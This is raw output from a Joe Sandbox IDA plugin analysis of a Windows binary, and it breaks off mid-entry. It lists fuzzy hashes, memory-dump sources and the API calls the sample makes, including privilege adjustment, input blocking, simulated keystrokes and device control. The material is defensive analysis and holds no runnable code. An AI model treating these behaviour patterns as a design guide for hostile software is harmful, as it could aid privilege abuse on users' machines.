                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: 24df6a3eae324ae343ac3ca797faa04d1ed07a9595ea35cd2cee836a58647abb
                                                      • Instruction ID: 443b5a7e9e439f32000d24b36a9559417f21d38d60591538de270755b7046816
                                                      • Opcode Fuzzy Hash: 24df6a3eae324ae343ac3ca797faa04d1ed07a9595ea35cd2cee836a58647abb
                                                      • Instruction Fuzzy Hash: BC312D75A00518DFDB00DF55D888EADBBF5FF49318F189099E805AB362DB31E856CBA0
                                                      APIs
                                                        • Part of subcall function 00E4FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E50668
                                                        • Part of subcall function 00E4FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E50685
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9170D
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E9173A
                                                      • GetLastError.KERNEL32 ref: 00E9174A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                      • String ID:
                                                      • API String ID: 577356006-0
                                                      • Opcode ID: 42e4b7d2ea52b13fe444285b2ee71a31f5a3c9453d9b776680c150eee6b6fa9b
                                                      • Instruction ID: 333e20e9674104f3781f338b15352365df713a93c8a3b1df54e1ceedaf7ef8de
                                                      • Opcode Fuzzy Hash: 42e4b7d2ea52b13fe444285b2ee71a31f5a3c9453d9b776680c150eee6b6fa9b
                                                      • Instruction Fuzzy Hash: 6E11C1B2800305AFE7189F54EC86E6AB7F9EF04B14B24856EE05663241EB70BC428A20
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E9D608
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00E9D645
                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E9D650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: bb5d31935200aa51a969deb2516ca40f013e59a8dcd330bbce40ce2a1945704d
                                                      • Instruction ID: 6dec14edddae778af463505e6faee279ac21b798a3e532fe84f41eaec5f50dc5
                                                      • Opcode Fuzzy Hash: bb5d31935200aa51a969deb2516ca40f013e59a8dcd330bbce40ce2a1945704d
                                                      • Instruction Fuzzy Hash: AF115EB5E05228BFDB108F99EC45FAFBBBCEB45B50F108165F908F7290D6704A058BA1
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E9168C
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E916A1
                                                      • FreeSid.ADVAPI32(?), ref: 00E916B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: e333af14bc5a24edeb3662f8f6dfc34ec6f50183314511e3214de84ec7cd04cd
                                                      • Instruction ID: cd40c0fd588b0030916f960c1936572deb200e81004d47497dd84e7cda5a0a2c
                                                      • Opcode Fuzzy Hash: e333af14bc5a24edeb3662f8f6dfc34ec6f50183314511e3214de84ec7cd04cd
                                                      • Instruction Fuzzy Hash: 64F04471940309FFDF00CFE08C8AEAEBBBCFB08204F1044A1E900E2181E331AA088A54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /
                                                      • API String ID: 0-2043925204
                                                      • Opcode ID: 3c1e541af4b398501acd9fd29dece0799bca67dd8825652c69b0dddfac3bdf0e
                                                      • Instruction ID: ea0da00db158db34c2791c98ae9d1ba615b6da95ab1316d0f281d99632d378e8
                                                      • Opcode Fuzzy Hash: 3c1e541af4b398501acd9fd29dece0799bca67dd8825652c69b0dddfac3bdf0e
                                                      • Instruction Fuzzy Hash: FC415C725806196FCB20DFB9EC48DBB77B8EB84398F2051ADF955E7280E6309D41CB50
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00E8D28C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: X64
                                                      • API String ID: 2645101109-893830106
                                                      • Opcode ID: c84acdd286e0a0b5b921e4496ee55e87de7f9d6b8e2f76f750126c523d805e03
                                                      • Instruction ID: aa8e49ca5e39078adde7b06e5836aeebda7af5ecfec7742c9a6b3daa3d4b564d
                                                      • Opcode Fuzzy Hash: c84acdd286e0a0b5b921e4496ee55e87de7f9d6b8e2f76f750126c523d805e03
                                                      • Instruction Fuzzy Hash: 42D0C9B480511DEECB90DB90EC88DD9B37CBB04305F100151F10AB2040D73095498F10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction ID: c1874d658ac0d9dda6a11af30a53103bd3aeeb56b094e744fbb2cb89c122bb9b
                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction Fuzzy Hash: F1022A71E002199FDF14CFA9C8906ADFBF1EF88315F25956AD919FB280D730AA45CB90
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EA6918
                                                      • FindClose.KERNEL32(00000000), ref: 00EA6961
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: c9261fea17f6c7135fb9e67db454e8387c08886c73915906ff223c1574c90e49
                                                      • Instruction ID: 4d6a9d943bbae09075352ae9a8de4f49d5850100d24b3758dc503bf54269b140
                                                      • Opcode Fuzzy Hash: c9261fea17f6c7135fb9e67db454e8387c08886c73915906ff223c1574c90e49
                                                      • Instruction Fuzzy Hash: DB1196756046009FC714DF29D488A16BBE5FF89328F18D599E4699F6A2C730EC05CB91
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EB4891,?,?,00000035,?), ref: 00EA37E4
                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EB4891,?,?,00000035,?), ref: 00EA37F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: 8219b42714a20f720b571707a6231584cdecc0be9baed9f2ef9ae3a5eedaee92
                                                      • Instruction ID: 3ce2a2a612ba7b796b8316b69c7545665f36f4ee7336243c4036a3d08943d25f
                                                      • Opcode Fuzzy Hash: 8219b42714a20f720b571707a6231584cdecc0be9baed9f2ef9ae3a5eedaee92
                                                      • Instruction Fuzzy Hash: FCF0EC717043142AD71057765C4DFDB7A9DEFC5761F100176F509F2291D5605905C6B0
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E9B25D
                                                      • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00E9B270
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: 9677cb9c6b4d39f5624fc2ec1a485d6f020e75a62e12f6229225be5d5a8f6fcf
                                                      • Instruction ID: 70b1f92d5c16ae632ec111b91ab624861ba192529eb2f60f905e7abd251c2950
                                                      • Opcode Fuzzy Hash: 9677cb9c6b4d39f5624fc2ec1a485d6f020e75a62e12f6229225be5d5a8f6fcf
                                                      • Instruction Fuzzy Hash: F6F01D7180424DAFDF059FA1D805BEE7BB4FF08309F10901AF955A51A1C37996169F94
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E911FC), ref: 00E910D4
                                                      • CloseHandle.KERNEL32(?,?,00E911FC), ref: 00E910E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: 790a223330e44a1c9b8bd65e69cb37b5116f0476566d604e5041b2514ac58979
                                                      • Instruction ID: 0e021b50cd15a5cecac510ff610930b6faf440c3b47f4003123937ff3ceb92b6
                                                      • Opcode Fuzzy Hash: 790a223330e44a1c9b8bd65e69cb37b5116f0476566d604e5041b2514ac58979
                                                      • Instruction Fuzzy Hash: 7CE04F32008600AEE7252B11FC05E7777E9EB04720F24882DF4A6904B1DB636C91DB10
                                                      Strings
                                                      • Variable is not of type 'Object'., xrefs: 00E80C40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable is not of type 'Object'.
                                                      • API String ID: 0-1840281001
                                                      • Opcode ID: 4412c63ebf048d18f12c040ff3873885787eb7d7b248d111fdb7257346725490
                                                      • Instruction ID: a5d9306785590095d1f1e765a5a26687c89a38ae72f8fbd74f8ab809f126f5df
                                                      • Opcode Fuzzy Hash: 4412c63ebf048d18f12c040ff3873885787eb7d7b248d111fdb7257346725490
                                                      • Instruction Fuzzy Hash: 29329F74900218DBCF14EF94D889AEDBBF5BF04308F646069E80ABB292D775ED49CB51
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E66766,?,?,00000008,?,?,00E6FEFE,00000000), ref: 00E66998
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 3bf1ae17a7caa4ff370419d964f9700d5600c62c5d5990520873bcf5bf24afe7
                                                      • Instruction ID: 73be308a30880355c202bf621fba3bf9fb8c0ae563fe4c9f584a78706b703531
                                                      • Opcode Fuzzy Hash: 3bf1ae17a7caa4ff370419d964f9700d5600c62c5d5990520873bcf5bf24afe7
                                                      • Instruction Fuzzy Hash: 26B16E31560608DFD719CF28D48ABA57BE0FF453A8F259658E899DF2A2C335E981CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 008cb27450e38e22f15055814f30c7fdf815a270e42096c219761e6771469a12
                                                      • Instruction ID: 05d00074234ecc99f76f7fb8fa24fa5129eee8d9e749c06751cf2dea042da927
                                                      • Opcode Fuzzy Hash: 008cb27450e38e22f15055814f30c7fdf815a270e42096c219761e6771469a12
                                                      • Instruction Fuzzy Hash: D2125F719002299FCB24DF58D9806EEB7F5FF48710F5491AAE849FB251EB709E81CB90
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 00EAEABD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 16725cf9014a9d0d8866b705607b3000758233e8a02823dc160ba0425827c5e3
                                                      • Instruction ID: 0d247b0a0b30e313c26f18b92e4e6d24d154cc08b757b2c065bcb815619f4bfd
                                                      • Opcode Fuzzy Hash: 16725cf9014a9d0d8866b705607b3000758233e8a02823dc160ba0425827c5e3
                                                      • Instruction Fuzzy Hash: 01E012352002049FC710DF59D404E9ABBD9AF59760F109416FD49EB351D670EC418B90
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00E503EE), ref: 00E509DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 86fe1c3e0f0b7bf790350a715f195a6702a3642eae9ebee422842275214cda0c
                                                      • Instruction ID: b4ec4ff6f28eddde3e3e909f139636d113dd4bfa62f7250af2c33b634aec37d9
                                                      • Opcode Fuzzy Hash: 86fe1c3e0f0b7bf790350a715f195a6702a3642eae9ebee422842275214cda0c
                                                      • Instruction Fuzzy Hash:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                      • Instruction ID: e3d5b76fa2b3bd5e2eff3a4d4e1166a5bc26dc9b78f066f624302f0638a85bdf
                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                      • Instruction Fuzzy Hash: EC51776160C7155ADB3C8528B95E7FE63C99B9230AF183D09DCC2F7282C611DE6DC362
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d648cfac7ebd6f8c8843a297d3f387a799a2ed1160a6833a27097169fc7078ce
                                                      • Instruction ID: 6353dd8109ceec1b2748214cb22d32ed64515624eee867d6073ac26ee1807efd
                                                      • Opcode Fuzzy Hash: d648cfac7ebd6f8c8843a297d3f387a799a2ed1160a6833a27097169fc7078ce
                                                      • Instruction Fuzzy Hash: 8E324622D6AF414DD7239635EC22335A349EFB73C9F14E737E86AB59A5EB29C4834100
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0c5dbb41147dfb86377ab2dc1cdfb1ed121d2e1c2302af5888c96d1c860fd91
                                                      • Instruction ID: 4c17e8e880066095e10e7fd4443e15fd5be25f33613dc757921c402de1099c75
                                                      • Opcode Fuzzy Hash: e0c5dbb41147dfb86377ab2dc1cdfb1ed121d2e1c2302af5888c96d1c860fd91
                                                      • Instruction Fuzzy Hash: DD322632A001058FCF28EF29D4D46BDB7A1EB46308F38A56AD55EFB291D230DD81DB61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d89aca13fdc004d4b541745da6fdd538aba2adb398fd583bdee586b16ceb0875
                                                      • Instruction ID: fe16a021edad24a27d6972b579c70d6dafa0f1452ed24fb044ec3b1da98b4b11
                                                      • Opcode Fuzzy Hash: d89aca13fdc004d4b541745da6fdd538aba2adb398fd583bdee586b16ceb0875
                                                      • Instruction Fuzzy Hash: ED22CFB1A00609DFDF14CF64D885AEEB7F2FF44304F20A629E856B7291EB75A914CB50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
